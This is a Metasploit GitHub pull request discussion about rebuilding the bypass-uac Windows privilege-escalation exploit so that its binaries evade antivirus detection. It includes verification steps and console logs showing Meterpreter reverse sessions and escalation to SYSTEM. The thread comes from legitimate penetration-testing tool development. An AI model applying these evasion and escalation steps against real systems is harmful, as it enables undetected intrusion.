Update/Revamp of bypass-uac #3028

Merged: 15 commits merged Feb 27, 2014

3 participants
thelightcosine commented Feb 23, 2014

This PR updates the source code of bypass-uac:

  • Project is updated to compile under Visual Studio 2013 to conform with our current build practices
  • Command Line usage help has been removed to eliminate unnecessary code and obvious strings
  • The CLogger class has been removed as it is unwanted outside of debugging and creates additional obvious strings and behaviour which lead to AV detections

The result is two new binaries that still work as intended but avoid almost all AV detections (the x64 binary does avoid all of them).

VERIFICATION STEPS

  • Get a shell on a Windows Vista or later box that does not have system privs
  • verify getsystem fails due to UAC
  • verify you are under an Admin user's context
  • Run the bypass-uac local exploit
  • VERIFY you get a new session
  • VERIFY getsystem now works on this new session
  • VERIFY the same steps on an x64 system using an x64 payload

Optional Verification Steps

  • pick your favorite AV
  • install it on the target system
  • reproduce the above steps
  • VERIFY you still get an elevated session
Commits by David Maloney:

  • remove unnecessary logging elements
  • update solutions for VS2013
  • remove the CLogger
  • Remove Print Usage: this removes unnecessary strings that can be used to easily identify our executable
OJ commented on 2895807 Feb 22, 2014

Looks good to me mate. Logging in something like this seems a bit odd anyway. Bigger payloads, more identifiable information, etc. There's no real upside to having it there except during debugging. Instead it should have had the dprintf approach that we use in Meterpreter.

The PlatformToolset we use in Meterpreter is v120_xp and I'd usually suggest that people do the same with their stuff. However, given that UAC isn't something that exists on XP it doesn't matter in this case :)

+1 to this, gets my vote.

Commit by David Maloney:

  • put new binaries in place: after cleaning up the source a bit and updating it for 2013, compiled new BINs. These BINs avoid almost all current AV detections and have been tested to ensure they still work.
thelightcosine commented Feb 23, 2014

@OJ thanks mate! If you see any additional code cleanup or improvements to make, by all means jump in on this. You are far more expert in this arena than I.

Meatballs1 commented Feb 23, 2014

Dude: #2431

OJ commented Feb 23, 2014

You say:

pick you favorite AV

I hear

pick your favorite pineapple to sit on.

I'll give this a crack in the next couple of days when I'm back at home. There's probably not much more that can be done, but I'll give the rest of the source a look at some point too.

You are far more expert in this arena than I.

The blind leading the blind :)

OJ commented Feb 23, 2014

Is it just me or does it feel like every bit of work that's done is just a late rehash of what @Meatballs1 has already done? :)

OJ added some commits Feb 26, 2014

  • Fix VS 2013 build, remove old files, rejig project config: This wasn't building cleanly for a few reasons with VS 2013 on my desktop. This commit fixes these problems with the configuration and makes things fit with the way we're now doing things (ie. output locations, etc). Incremental builds are disabled as they were causing problems, but this isn't a concern for a project as small as this.

@OJ OJ self-assigned this Feb 26, 2014

OJ commented Feb 26, 2014

From my testing there's a bit of strange behaviour. For the most part this works, but this always happens:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 10.1.10.40:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (769024 bytes) to 10.1.10.43
[*] Meterpreter session 4 opened (10.1.10.40:4444 -> 10.1.10.43:55108) at 2014-02-26 16:47:59 +1000
[-] Exploit failed: Rex::TimeoutError Operation timed out.

meterpreter > getuid
Server username: WIN-KM66F94HDLL\OJ
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Notice how the exploit claims that it has failed, which happens after a period of time where it appears to hang for a while. I'm not sure what's going on here. This is a Windows 7 x86 SP1 machine.

Thoughts @dmaloney-r7 ?

OJ commented Feb 26, 2014

The same behaviour occurs when the x86 payload is used on x64.

Also, if the x64 payload is used on x64, this happens:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 10.1.10.40:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
msf exploit(bypassuac) > 

It's as if it is failing to pick up that the target OS for the session is x64 and it's pushing a 32-bit stager up and trying to inject an x64 payload.

Are you seeing anything similar @dmaloney-r7 ?

Commit: Adjust project config

  • Remove editbin usage for console apps
  • Remove whole program optimisation
OJ commented Feb 26, 2014

You'll find a PR here thelightcosine#11 which helps in revamping the code a bit but more from the compile/build side rather than the AV avoidance side.

Meatballs1 commented Feb 26, 2014

@OJ I think the x64 issue is that it is embedding x64 shellcode into an x86 template (ie 73kb x86 instead of 6kb x64 template)

This should be resolved with #2661 if anyone cares...

N.B. if you look at my output for that I also hit [-] Exploit failed: Rex::TimeoutError Operation timed out. so it isn't related to this module.

OJ commented Feb 26, 2014

Yeah that was what I thought it might have been too mate. Certainly a sign when the program that is crashing on the desktop is Apache bench, which shouldn't show its face in x64!

If that's the case then I'll land this baby for now and push on with the rest. Sound ok to you guys?

Meatballs1 commented Feb 26, 2014

Sounds good to me.

dmaloney-r7 added some commits Feb 26, 2014

thelightcosine commented Feb 26, 2014

I landed Meatballs PR, and OJ's PR against this branch, but I do still see the Timeout. I had assumed before that it was an issue with my VM environment.

David Maloney added some commits Feb 26, 2014

  • cleanup methods in bypassuac module: apply the same sort of method cleanup as in Meatballs injection based module.
OJ commented Feb 26, 2014

So it appears that the bypassuac exe is no longer shutting down nicely. Taking a look at it now.

OJ commented Feb 26, 2014

Can someone tell me WTF this does? https://github.com/dmaloney-r7/metasploit-framework/blob/feature/bypassuac/revamp/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate.cpp#L225

I know it's been around for a while, but it looks like it does nothing.

Meatballs1 commented Feb 27, 2014

Redundant debugging?

thelightcosine commented Feb 27, 2014

looks whack to me

David Maloney added some commits Feb 27, 2014

  • remove some dead code paths: refactor some dead conditionals and a case/switch that wasn't doing anything
thelightcosine commented Feb 27, 2014

@OJ I think I created that dead codepath when I removed the logger, now that I think about it. Removed a few other spots like that.

David Maloney added some commits Feb 27, 2014

  • make bypassuac module clean itself up: since the IO redirection hangs our original process, we have the module wait for the session, then kill the spawning process and delete the exe we dropped
  • cleanup tior and .tmp files: bypassuac module now also cleans up tior.exe and all the .tmp files so we have a clean environment afterwards
OJ commented on lib/msf/core/post/common.rb in f66709b Feb 27, 2014

Do you think it'd be better to have an option in the arg list to say "please terminate this process" rather than force it every time? The function name doesn't imply process closing.

OJ commented on modules/exploits/windows/local/bypassuac.rb in f66709b Feb 27, 2014

finish him

OJ commented on f66709b Feb 27, 2014

Yay! She works on x64:

msf exploit(bypassuac) > exploit

[*] Started reverse handler on 10.1.10.40:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 6144 bytes long being uploaded..
[*] Sending stage (971264 bytes) to 10.1.10.32
[*] Meterpreter session 6 opened (10.1.10.40:4444 -> 10.1.10.32:63919) at 2014-02-28 09:09:41 +1000

meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64

I'm going to land this baby.

OJ added a commit that referenced this pull request Feb 27, 2014

@OJ OJ merged commit b952b10 into rapid7:master Feb 27, 2014

1 check passed: the Travis CI build passed.

@thelightcosine thelightcosine deleted the thelightcosine:feature/bypassuac/revamp branch Mar 4, 2015
